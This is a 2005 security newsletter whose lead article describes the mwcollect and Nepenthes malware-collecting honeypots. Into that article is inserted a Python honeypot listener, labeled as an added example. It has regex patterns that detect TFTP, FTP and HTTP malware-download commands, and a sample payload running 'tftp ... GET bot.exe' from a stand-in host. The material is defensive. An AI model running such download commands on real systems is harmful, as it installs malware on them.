
Security UPDATE--Honeypots That Collect Malware--August 31, 2005

This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE.

A Robust Combination from Symantec

How to solve the anti-spam dilemma


1. In Focus: Honeypots That Collect Malware

2. Security News and Features

- Recent Security Vulnerabilities

- Vulnerabilities in PHP-based Libraries

- Secure Computing to Acquire CyberGuard

- EarthLink to Acquire Security Solutions Maker Aluria Software

3. Security Toolkit

- Security Matters Blog


4. New and Improved

- Pocket PC File Encryption


==== Sponsor: Symantec ====

A Robust Combination from Symantec

Staying on top of today's vulnerabilities and threats is one of the most difficult, time-consuming, and even risky tasks facing IT professionals like you. Never has it been so important to proactively manage your IT environment. Fortunately, Symantec can help.

Symantec LiveState Patch Manager 6.0 helps keep your enterprise devices secure and available by identifying known vulnerabilities and then installing necessary patches on hundreds of systems in minutes, not hours. That includes mobile and remote devices, too.

For extra protection from threats that even the latest patches can't address, there's Symantec Client Security 3.0. With its exclusive intrusion prevention technology, Symantec Client Security 3.0 proactively protects systems against known and unknown exploits before they can compromise your system, including spyware, adware, viruses, and other malicious intrusions. Learn more at


==== 1. In Focus: Honeypots That Collect Malware ====

by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

For the last two weeks, I've written about proactive honeypots that seek out malicious Web sites: two of them are unavailable to the public, and one you can download and run on your own networks. If you missed either of those articles, they're available on our Web site at the URLs below. This week, I'll discuss two "passive" honeypots--that is, honeypots that sit and wait for intrusion attempts.

Because honeypots present an attack point for potential intruders, they're useful in determining what sort of intrusion attempts are being launched against your network. In some cases, they can detect intrusion methods that are completely unknown to even the most up-to-date Intrusion Detection Systems (IDSs).

I recently learned about two new honeypots. The first is mwcollect (at the URL below), which was released in April 2005 and is partially funded by The Honeynet Project. Mwcollect is designed specifically to collect malware--thus the "mw" prefix in the mwcollect name. The tool runs on Linux and OpenBSD and can also run on Cygwin, a Linux environment that runs on Windows platforms.

Mwcollect is a little different from typical honeypots because it was originally designed to collect bot software, but the current version collects worms and other forms of malware that take advantage of the vulnerabilities that mwcollect exposes. According to the mwcollect Web site, systems that run the tool can't be infected with malware because of the way mwcollect operates internally. It binds to specified ports, waits for an exploit attempt, scans for shellcode, and tries to download any related malware. Captured malware can then be added to a database at the mwcollect Web site.

The next version of mwcollect will allow three levels of network interactivity. The first level is the same as I describe above. The second level will passively analyze network traffic (like a sniffer in promiscuous mode would) and will try to download any related malware. The third or lowest level of interactivity will also passively analyze network traffic but won't try to download related malware. You can learn a little more about the tool at the Web site, and join in an Internet Relay Chat (IRC) for further discussion.

The second new honeypot, Nepenthes, was released earlier this month and is similar to mwcollect. It too presents known vulnerabilities to the network and waits for intrusion attempts. Current modules for Nepenthes allow it to emulate problems with DCOM, Local Security Authority Service (LSASS), WINS, ASN1, NetBIOS, SQL Server, and many other Microsoft services. Because Nepenthes runs on Linux systems, none of those services would actually be available, which means exploits against them would have little or no effect on the underlying OS.

Just like mwcollect, when Nepenthes detects intrusion attempts, it tries to download any related malware through a variety of methods, including FTP, Trivial FTP (TFTP), and HTTP. Captured malware is then sent to a central server hosted by the developers of the tool.

Documentation for Nepenthes doesn't explain what goes on under the hood. But as best I can determine (I haven't actually installed the tool yet), it captures shellcode exploits, looks for instructions that try to download code from the Internet (which many types of malware contain), and, if it finds such instructions, tries to download the malware in accordance with the intruder's intent--for example, if the captured code indicates that the system should use FTP to download a file, Nepenthes will try to do that. I suspect that mwcollect works in a similar fashion. Nepenthes doesn't appear to run on Windows platforms under Cygwin, so you'll probably need a Linux-based system to put it to use on your networks.
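The bind-wait-scan-extract sequence that the two tools share, as an added illustrative example in Python (this is not mwcollect or Nepenthes code, and the regular expressions, the shellcode heuristic, the `Capture` record and the sample payload are all constructed assumptions): the listener accepts one connection, records whatever is sent without ever executing it, flags content that looks like shellcode, and extracts the FTP, TFTP and HTTP download instructions a collector would act on. The fetch step itself is deliberately absent; a real collector would hand the extracted entries to a sandboxed downloader and never run anything it received.

```python
"""Passive malware-collecting honeypot core (illustrative; not mwcollect/Nepenthes code)."""
import re
import socket
import threading
from dataclasses import dataclass, field

# Detection patterns for download intent in captured payloads: plain URLs, Windows tftp
# client invocations, and scripted ftp sessions ("echo open HOST" ... "echo get FILE").
URL_RE = re.compile(rb"(?:https?|ftp)://[\w.\-]+(?::\d+)?/[^\s\"'<>]*", re.I)
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+(?:-i\s+)?([\w.\-]+)\s+get\s+(\S+)", re.I)
FTP_OPEN_RE = re.compile(rb"echo\s+open\s+([\w.\-]+)(?:\s+(\d+))?", re.I)
FTP_GET_RE = re.compile(rb"echo\s+get\s+(\S+)", re.I)
DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21}

@dataclass
class Capture:
    src: str                 # peer address the bytes came from
    size: int                # bytes received
    shellcode_like: bool     # heuristic flag from looks_like_shellcode()
    downloads: list = field(default_factory=list)  # dicts: proto, host, port, resource

def looks_like_shellcode(payload: bytes) -> bool:
    """Cheap heuristic: a NOP sled, or mostly non-text bytes where a client would send text."""
    if b"\x90" * 16 in payload:
        return True
    non_text = sum(1 for b in payload if b not in b"\t\n\r" and not 0x20 <= b < 0x7F)
    return non_text / max(len(payload), 1) > 0.3

def extract_downloads(payload: bytes) -> list:
    """Return every download instruction found, normalised to proto/host/port/resource."""
    found = []
    for m in URL_RE.finditer(payload):
        proto, rest = m.group(0).decode("ascii", "replace").split("://", 1)
        proto = proto.lower()
        hostport, _, resource = rest.partition("/")
        host, _, port = hostport.partition(":")
        found.append({"proto": proto, "host": host, "resource": "/" + resource,
                      "port": int(port) if port else DEFAULT_PORT[proto]})
    for m in TFTP_RE.finditer(payload):
        found.append({"proto": "tftp", "host": m.group(1).decode(), "port": 69,
                      "resource": m.group(2).decode()})
    opens = FTP_OPEN_RE.findall(payload)
    if opens:  # the first "echo open HOST [PORT]" serves every later "echo get FILE"
        host, port = opens[0]
        for f in FTP_GET_RE.findall(payload):
            found.append({"proto": "ftp", "host": host.decode(), "resource": f.decode(),
                          "port": int(port) if port else 21})
    return found

def analyze(src: str, payload: bytes) -> Capture:
    return Capture(src, len(payload), looks_like_shellcode(payload), extract_downloads(payload))

def make_listener(host: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """Bind the honeypot port; port 0 lets the OS choose one (handy for tests)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    return srv

def collect_one(srv: socket.socket, max_bytes: int = 65536, timeout: float = 5.0) -> Capture:
    """Accept one connection, read until close, limit or silence, then analyse; nothing is run."""
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    chunks, total = [], 0
    with conn:
        conn.settimeout(timeout)
        while total < max_bytes:
            try:
                chunk = conn.recv(min(4096, max_bytes - total))
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
            total += len(chunk)
    return analyze(f"{peer[0]}:{peer[1]}", b"".join(chunks))

def loopback_capture(payload: bytes) -> Capture:
    """Drive the listener in-process: a client thread sends `payload` to the bound port."""
    srv = make_listener()
    port = srv.getsockname()[1]
    def client() -> None:
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(payload)
    t = threading.Thread(target=client)
    t.start()
    try:
        return collect_one(srv)
    finally:
        t.join()
        srv.close()

# Constructed sample: filler and a NOP sled stand in for an exploit, followed by the kind of
# download command the article describes.  Not real shellcode; 192.0.2.0/24 is TEST-NET.
SAMPLE_PAYLOAD = b"\x00\x01\x02\x03" * 4 + b"\x90" * 32 + b"cmd /c tftp -i 192.0.2.10 GET bot.exe\r\n"

if __name__ == "__main__":
    print(analyze("constructed-sample", SAMPLE_PAYLOAD))
```

Run stand-alone, the script analyses the constructed sample and reports a TFTP fetch of `bot.exe` from 192.0.2.10; `collect_one(make_listener("0.0.0.0", PORT))` with PORT set to the port of the service being emulated is the live shape. The heuristic is intentionally crude: a NOP-sled check and a non-text ratio catch the obvious cases, and the point is that the honeypot only has to recognise download intent, not understand the exploit.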

If you use honeypots, as so many administrators do these days, be sure to take a closer look at mwcollect and Nepenthes.


We need your help! Windows IT Pro is launching its second Windows IT Pro Industry Salary Survey, and we want to find out all about you and what makes you a satisfied IT pro. When you complete the survey (about 10 minutes of your time), you'll be entered in a drawing for one of two $300 American Express gift certificates. Look for the survey results--and see how you stack up against your peers--in our December issue. To take the survey, go to


==== Sponsor: Postini ====

How to solve the anti-spam dilemma

In this free white paper learn why older spam prevention technologies using traditional content filtering don't work against the latest spammer tactics - and why more corporate email administrators are turning to a more accurate, more effective approach: managed email security service. Find out how to achieve email security dynamically with multiple layer protection ... minimize false positives ... cut email administration costs (and hassles) ... and keep user communities happy and productive. Download your free copy now.


==== 2. Security News and Features ====

Recent Security Vulnerabilities

If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at

Vulnerabilities in PHP-based Libraries

Major security problems in two popular Hypertext Preprocessor (PHP)-based libraries have led to complete removal of a particular programming function in those libraries. In June, problems were discovered in libraries that provide PHP-based support for XML and RPC, both of which are used by many applications today, including hugely popular blog software packages. A subsequent code audit revealed still more vulnerabilities.

Secure Computing to Acquire CyberGuard

Secure Computing announced that it will acquire CyberGuard. Under the terms of the deal, Secure Computing will acquire all outstanding shares of CyberGuard common stock and in turn give shares of its common stock, as well as cash, to CyberGuard stockholders.

EarthLink to Acquire Security Solutions Maker Aluria Software

EarthLink and Aluria Software announced a deal in which EarthLink will acquire the assets of Aluria, makers of the Spyware Eliminator software. Terms of the deal, expected to close in September, weren't announced.


==== Resources and Events ====

SQL Server 2005 Roadshow Is Coming to a City Near You

Get the facts about migrating to SQL Server 2005. SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database computing environment. Attend and receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now!

Consolidate Your SQL Server Infrastructure

Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. In this free Web seminar, learn how shared data clustering technology can reduce capital expenditures by at least 50 percent, improve management efficiency, reduce operational expense, ensure high availability across all SQL Server instances, and more! Find out how you can reduce the overall Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years! Sign up today!

High Risk Internet Access: Are You in Control?

Defending against Internet criminals, spyware, and phishing and addressing the points of risk that Internet-enabled applications expose your organization to can seem like an epic battle with Medusa. So how do you take control of these valuable resources? In this free Web seminar, you'll get the tools you need to help you analyze the impact Internet-based threats have on your organization and tools to aid you in the construction of Acceptable-Use Policies (AUPs).

Get Ready for SQL Server 2005 Roadshow in Europe

Back by popular demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now!

Discover SQL Server 2005 for the enterprise. Are you prepared?

In this free, half-day event, you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today!

All high availability solutions are not created equal--how does yours measure up?

In this free Web seminar, you'll get the tools you need to ensure your systems aren't going down. You'll discover the various categories of high availability and disaster recovery solutions available and the pros and cons of each. You'll learn what solutions help you take preemptive, corrective action without resorting to a full system failover, or in extreme cases, that perform a nondisruptive, automatic switchover to a secondary server.


==== Featured White Paper ====

The Impact of Disk Defragmentation

Nearly every IT professional has a fragmentation horror story--in which fragmentation severely degraded performance so that systems were unusable. In this free white paper, learn what impact fragmentation has on users and system activities and discover how quickly fragmentation accumulates as a result of these activities. Plus get the recommendations you need to manage the frequency of defragmentation across your infrastructure.


==== 3. Security Toolkit ====

Security Matters Blog: Wi-Fi Security Is Better Than I Expected

by Mark Joseph Edwards,

There's a lot of talk about the need for increased Wi-Fi security. I was surprised at what I found when I did a little "war driving" in my area.


by John Savill,

Q: I created a custom .adm file and imported it into a Group Policy Object's (GPO's) Administrative Templates. Why can't I see any of the settings in Group Policy Editor (GPE)?

Find the answer at


==== Announcements ====

(from Windows IT Pro and its partners)

Stay Up-To-Date with the Windows IT Security Newsletter

Each new issue of the Windows IT Security newsletter features related product coverage of the best security tools available and expert advice on the best way to implement various security components. We've also expanded our security content to include even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get online access to our entire online security article database (over 1900 articles)! Subscribe today:

VIP Monthly Online Pass = Quick Security Answers!

Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire online article database, including exclusive, subscriber-only Windows IT Security newsletter content. That's a database of over 1900 security articles to help you get all the answers you need, when you need them. Sign up now:


==== 4. New and Improved ====

by Renee Munshi, [email protected]

Pocket PC File Encryption

Infotecs offers ViPNet Safe Disk for Pocket PC, which encrypts and password-protects sensitive files on PDAs. Data is protected even when the device is switched off or in standby mode. You can open and edit any file from a secure folder in a word processor or database program--the file is automatically decrypted when opened and encrypted when saved. ViPNet Safe Disk for Pocket PC supports two 256-bit encryption algorithms: Advanced Encryption Standard (AES) and Government Standard (GOST). The interface is specially designed to help PDA users manage protected files and folders with just a few taps. You can exchange protected data with a PC that's running ViPNet Safe Disk. ViPNet Safe Disk for Pocket PC runs under Windows Mobile 2003 and costs $26.40 for a single-user license. For more information, go to

Tell Us About a Hot Product and Get a T-Shirt!

Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to

[email protected]

Editor's note: Share Your Security Discoveries and Get $100

Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to [email protected] If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.


==== Sponsored Links ====

Professional and secure remote control from all major platforms

Argent Versus MOM 2005

Experts Pick the Best Windows Monitoring Solution

Tech jobs at Dice

Search 65K+ new IT jobs daily--Tech expert jobs at top companies!


==== Contact Us ====

About the newsletter -- [email protected]

About technical questions --

About product news -- [email protected]

About your subscription -- [email protected]

About sponsoring Security UPDATE -- [email protected]


This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.

View the Windows IT Pro privacy policy at

Windows IT Pro, a division of Penton Media, Inc.

221 East 29th Street, Loveland, CO 80538

Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.
